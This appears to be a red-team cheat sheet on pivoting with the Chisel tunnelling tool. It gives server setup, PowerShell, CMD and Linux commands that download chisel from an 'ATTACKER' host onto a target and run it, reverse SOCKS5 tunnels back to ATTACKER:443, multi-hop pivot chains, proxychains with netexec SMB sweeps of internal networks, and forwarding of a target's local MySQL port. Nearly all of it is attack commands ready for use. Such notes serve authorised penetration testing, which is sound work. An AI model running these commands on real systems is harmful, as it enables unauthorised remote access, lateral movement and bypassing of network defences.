######
Chisel
######

| https://github.com/jpillora/chisel
| https://github.com/jpillora/chisel/releases/latest

***************
Chisel Instance
***************

| I use only one instance to manage multiple proxy endpoints.
| (replace bla:bla with other random creds if you want to)

.. code-block:: bash

  docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80
  docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel # Get container ip, probably 172.17.0.2
  docker logs chisel -f # Stream logs
  
|

****************
Target as Socks5
****************

| Upload chisel on target, and link it to chisel server.
| Don't forget to set credentials if you replaced them in the first place.

| POWERSHELL

.. code-block:: powershell

  (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe")
  Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks"

| CMD ALTERNATIVE

.. code-block:: batch

  START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks
  # If you need to kill all chisel processes ...
  # taskkill /F /IM chisel.exe

|

| Linux

.. code-block:: bash

  wget http://ATTACKER/chisel -O /tmp/chisel;chmod 755 /tmp/chisel
  /tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks &

| Great, our chisel container now listen on port 5000 as socks5 !
| Here is an example about how to use it with proxychains

.. code-block:: bash

  echo -e '[ProxyList]\nsocks5 172.17.0.2 5000'>/tmp/TARGET1 
  proxychains -q -f /tmp/TARGET1 netexec smb TARGET_NETWORK

| 

******************
Target as Listener
******************

| You want the target to listen on a port and forward the traffic back to you ?
| Let's say you want to chain multiple chisel
| TARGET2 => TARGET1:7777 => ATTACKER:443

| Linux

.. code-block:: bash

  # Target1
  chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 &
  
  # Target2 (socks5)
  chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks &

  # Attacker
  echo -e '[ProxyList]\nsocks5 172.17.0.2 6000'>/tmp/TARGET2 
  proxychains -q -f /tmp/TARGET2 netexec smb TARGET2_NETWORK

|

************************
Expose Target Local Port
************************

| Target is listening locally and you want to access the port from remote.
| You bind your local port (here 8888 on chisel container) and forward traffic to the target localhost:3306

| Linux

.. code-block:: bash

  /root/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:8888:127.0.0.1:3306 &

|
